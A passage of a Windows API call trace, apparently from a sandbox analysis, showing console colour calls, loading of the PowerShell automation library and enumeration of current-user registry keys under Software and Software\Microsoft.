[0086.403] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
[0086.404] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
[0086.404] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
[0086.406] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0xc) returned 1
[0086.407] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0xc) returned 1
[0086.408] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0x7) returned 1
[0086.409] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0x7) returned 1
[0086.410] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0xc) returned 1
[0086.411] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0xc) returned 1
[0086.412] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0x7) returned 1
[0086.412] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0x7) returned 1
[0086.414] SetConsoleTextAttribute (hConsoleOutput=0xa7, wAttributes=0xc) returned 1
[0086.415] SetConsoleTextAttribute (hConsoleOutput=0xa7, wAttributes=0xc) returned 1
[0086.416] SetConsoleTextAttribute (hConsoleOutput=0xa7, wAttributes=0x7) returned 1
[0086.416] SetConsoleTextAttribute (hConsoleOutput=0xa7, wAttributes=0x7) returned 1
[0086.418] SetConsoleTextAttribute (hConsoleOutput=0xb3, wAttributes=0xc) returned 1
[0086.419] SetConsoleTextAttribute (hConsoleOutput=0xb3, wAttributes=0xc) returned 1
[0086.420] SetConsoleTextAttribute (hConsoleOutput=0xb3, wAttributes=0x7) returned 1
[0086.420] SetConsoleTextAttribute (hConsoleOutput=0xb3, wAttributes=0x7) returned 1
[0086.422] SetConsoleTextAttribute (hConsoleOutput=0xbf, wAttributes=0xc) returned 1
[0086.423] SetConsoleTextAttribute (hConsoleOutput=0xbf, wAttributes=0xc) returned 1
[0086.424] SetConsoleTextAttribute (hConsoleOutput=0xbf, wAttributes=0x7) returned 1
[0086.424] SetConsoleTextAttribute (hConsoleOutput=0xbf, wAttributes=0x7) returned 1
[0086.426] SetConsoleTextAttribute (hConsoleOutput=0xcb, wAttributes=0xc) returned 1
[0086.427] SetConsoleTextAttribute (hConsoleOutput=0xcb, wAttributes=0xc) returned 1
[0086.428] SetConsoleTextAttribute (hConsoleOutput=0xcb, wAttributes=0x7) returned 1
[0086.428] SetConsoleTextAttribute (hConsoleOutput=0xcb, wAttributes=0x7) returned 1
[0086.430] SetConsoleTextAttribute (hConsoleOutput=0xd7, wAttributes=0xc) returned 1
[0086.431] SetConsoleTextAttribute (hConsoleOutput=0xd7, wAttributes=0xc) returned 1
[0086.432] SetConsoleTextAttribute (hConsoleOutput=0xd7, wAttributes=0x7) returned 1
[0086.432] SetConsoleTextAttribute (hConsoleOutput=0xd7, wAttributes=0x7) returned 1
[0086.434] SetConsoleTextAttribute (hConsoleOutput=0xe3, wAttributes=0xc) returned 1
[0086.435] SetConsoleTextAttribute (hConsoleOutput=0xe3, wAttributes=0xc) returned 1
[0086.436] SetConsoleTextAttribute (hConsoleOutput=0xe3, wAttributes=0x7) returned 1
[0086.436] SetConsoleTextAttribute (hConsoleOutput=0xe3, wAttributes=0x7) returned 1
[0086.438] SetConsoleTextAttribute (hConsoleOutput=0xef, wAttributes=0xc) returned 1
[0086.439] SetConsoleTextAttribute (hConsoleOutput=0xef, wAttributes=0xc) returned 1
[0086.440] SetConsoleTextAttribute (hConsoleOutput=0xef, wAttributes=0x7) returned 1
[0086.440] SetConsoleTextAttribute (hConsoleOutput=0xef, wAttributes=0x7) returned 1
[0086.442] SetConsoleTextAttribute (hConsoleOutput=0xfb, wAttributes=0xc) returned 1
[0086.443] SetConsoleTextAttribute (hConsoleOutput=0xfb, wAttributes=0xc) returned 1
[0086.444] SetConsoleTextAttribute (hConsoleOutput=0xfb, wAttributes=0x7) returned 1
[0086.444] SetConsoleTextAttribute (hConsoleOutput=0xfb, wAttributes=0x7) returned 1
[0086.446] SetConsoleTextAttribute (hConsoleOutput=0x107, wAttributes=0xc) returned 1
[0086.447] SetConsoleTextAttribute (hConsoleOutput=0x107, wAttributes=0xc) returned 1
[0086.448] SetConsoleTextAttribute (hConsoleOutput=0x107, wAttributes=0x7) returned 1
[0086.448] SetConsoleTextAttribute (hConsoleOutput=0x107, wAttributes=0x7) returned 1
[0086.450] SetConsoleTextAttribute (hConsoleOutput=0x113, wAttributes=0xc) returned 1
[0086.451] SetConsoleTextAttribute (hConsoleOutput=0x113, wAttributes=0xc) returned 1
[0086.452] SetConsoleTextAttribute (hConsoleOutput=0x113, wAttributes=0x7) returned 1
[0086.452] SetConsoleTextAttribute (hConsoleOutput=0x113, wAttributes=0x7) returned 1
[0086.454] SetConsoleTextAttribute (hConsoleOutput=0x11f, wAttributes=0xc) returned 1
[0086.455] SetConsoleTextAttribute (hConsoleOutput=0x11f, wAttributes=0xc) returned 1
[0086.456] SetConsoleTextAttribute (hConsoleOutput=0x11f, wAttributes=0x7) returned 1
[0086.456] SetConsoleTextAttribute (hConsoleOutput=0x11f, wAttributes=0x7) returned 1
[0086.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.560] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x0) returned 0x2
[0086.560] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.561] CoTaskMemFree (pv=0x0)
[0086.561] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.561] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.561] CoTaskMemFree (pv=0x2baf50)
[0086.561] CoTaskMemFree (pv=0x0)
[0086.561] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.561] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.561] CoTaskMemFree (pv=0x2baf50)
[0086.561] CoTaskMemFree (pv=0x0)
[0086.561] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.561] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.561] CoTaskMemFree (pv=0x2baf50)
[0086.561] CoTaskMemFree (pv=0x0)
[0086.561] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.561] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.561] CoTaskMemFree (pv=0x2baf50)
[0086.561] CoTaskMemFree (pv=0x0)
[0086.561] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.561] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.561] CoTaskMemFree (pv=0x2baf50)
[0086.561] CoTaskMemFree (pv=0x0)
[0086.561] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.561] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.561] CoTaskMemFree (pv=0x2baf50)
[0086.561] CoTaskMemFree (pv=0x0)
[0086.561] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.561] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.561] CoTaskMemFree (pv=0x2baf50)
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.562] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.562] CoTaskMemFree (pv=0x2baf50)
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.562] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.562] CoTaskMemFree (pv=0x2baf50)
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.562] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.562] CoTaskMemFree (pv=0x2baf50)
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.562] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.562] CoTaskMemFree (pv=0x2baf50)
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.562] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.562] CoTaskMemFree (pv=0x2baf50)
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x40c) returned 0x0
[0086.562] RegQueryInfoKeyW (in: hKey=0x40c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.562] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.562] CoTaskMemFree (pv=0x2baf50)
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.562] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.562] CoTaskMemFree (pv=0x2baf50)
[0086.562] CoTaskMemFree (pv=0x0)
[0086.562] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.563] CoTaskMemFree (pv=0x2baf50)
[0086.563] CoTaskMemFree (pv=0x0)
[0086.563] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.563] CoTaskMemFree (pv=0x2baf50)
[0086.563] CoTaskMemFree (pv=0x0)
[0086.563] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.563] CoTaskMemFree (pv=0x2baf50)
[0086.563] CoTaskMemFree (pv=0x0)
[0086.563] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.563] CoTaskMemFree (pv=0x2baf50)
[0086.563] CoTaskMemFree (pv=0x0)
[0086.563] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.563] CoTaskMemFree (pv=0x2baf50)
[0086.563] CoTaskMemFree (pv=0x0)
[0086.563] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.563] CoTaskMemFree (pv=0x2baf50)
[0086.563] CoTaskMemFree (pv=0x0)
[0086.563] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.563] CoTaskMemFree (pv=0x2baf50)
[0086.563] CoTaskMemFree (pv=0x0)
[0086.563] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.563] CoTaskMemFree (pv=0x2baf50)
[0086.563] CoTaskMemFree (pv=0x0)
[0086.563] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.563] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.564] CoTaskMemFree (pv=0x2baf50)
[0086.564] CoTaskMemFree (pv=0x0)
[0086.564] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.564] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.564] CoTaskMemFree (pv=0x2baf50)
[0086.564] CoTaskMemFree (pv=0x0)
[0086.564] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.564] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.564] CoTaskMemFree (pv=0x2baf50)
[0086.564] CoTaskMemFree (pv=0x0)
[0086.564] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.564] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.564] CoTaskMemFree (pv=0x2baf50)
[0086.564] CoTaskMemFree (pv=0x0)
[0086.564] RegOpenKeyExW (in: hKey=0x40c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3e0) returned 0x0
[0086.564] RegCloseKey (hKey=0x40c) returned 0x0
[0086.564] RegQueryInfoKeyW (in: hKey=0x3e0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.564] CoTaskMemFree (pv=0x0)
[0086.564] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.564] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.564] CoTaskMemFree (pv=0x2baf50)
[0086.564] CoTaskMemFree (pv=0x0)
[0086.564] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.564] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.564] CoTaskMemFree (pv=0x2baf50)
[0086.564] CoTaskMemFree (pv=0x0)
[0086.564] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.564] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.564] CoTaskMemFree (pv=0x2baf50)
[0086.564] CoTaskMemFree (pv=0x0)
[0086.565] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.565] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.565] CoTaskMemFree (pv=0x2baf50)
[0086.565] CoTaskMemFree (pv=0x0)
[0086.565] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.565] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.565] CoTaskMemFree (pv=0x2baf50)
[0086.565] CoTaskMemFree (pv=0x0)
[0086.565] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.565] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.565] CoTaskMemFree (pv=0x2baf50)
[0086.565] CoTaskMemFree (pv=0x0)
[0086.565] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.565] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.565] CoTaskMemFree (pv=0x2baf50)
[0086.565] CoTaskMemFree (pv=0x0)
[0086.565] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.565] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.565] CoTaskMemFree (pv=0x2baf50)
[0086.565] CoTaskMemFree (pv=0x0)
[0086.565] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.565] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.565] CoTaskMemFree (pv=0x2baf50)
[0086.565] CoTaskMemFree (pv=0x0)
[0086.565] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.565] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.565] CoTaskMemFree (pv=0x2baf50)
[0086.565] CoTaskMemFree (pv=0x0)
[0086.565] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.565] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.565] CoTaskMemFree (pv=0x2baf50)
[0086.565] CoTaskMemFree (pv=0x0)
[0086.566] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
